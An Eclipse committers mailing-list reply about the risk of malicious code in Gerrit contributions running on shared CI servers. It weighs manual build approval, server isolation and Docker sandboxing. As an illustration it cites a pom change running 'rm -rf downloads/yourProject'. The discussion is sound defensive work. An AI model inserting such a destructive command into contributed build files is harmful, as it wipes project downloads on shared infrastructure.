Re: [eclipse.org-committers] Malicious executable content in Gerrit cont

[Mickael Istria <mistria@xxxxxxxxxx>]

On 12/10/2014 03:18 PM, Mikaël Barbero wrote:

Manual trigger for non whitelisted users would be a huge regression regarding the contribution workflow (see this comment https://bugs.eclipse.org/bugs/show_bug.cgi?id=375350#c3).

Contributing a change in a pom file that invokes "rm -rf downloads/yourProject" would end in an even bigger regression ;)
Having to manually promote the latest snapshot build because of low permissions on hudson.eclipse.org is also another possible regression.

I would rather see the HIPP to be much more isolated from the rest of the Foundation's servers like suggested in the very same comment.

Could Docker help there? Let's say by making the Gerrit triggers run in a Docker container which can be destroyed safely? Is even such container approach really safe?

This issue may have already been addressed by other services. e.g., when someone sends a pull-request to a project hosted on github with a travis-ci trigger, the build is triggered and can almost do the same amount of damages that we are talking about. Does anybody know how do they cope with this?

GitHub Pull Request Builder Plugin ( https://wiki.jenkins-ci.org/display/JENKINS/GitHub+pull+request+builder+plugin ) requires a trusted person of the project, to manually approve the build of the incoming change. The process is that before kicking a build.

--
Mickael Istria
Eclipse developer at JBoss, by Red Hat
My blog - My Tweets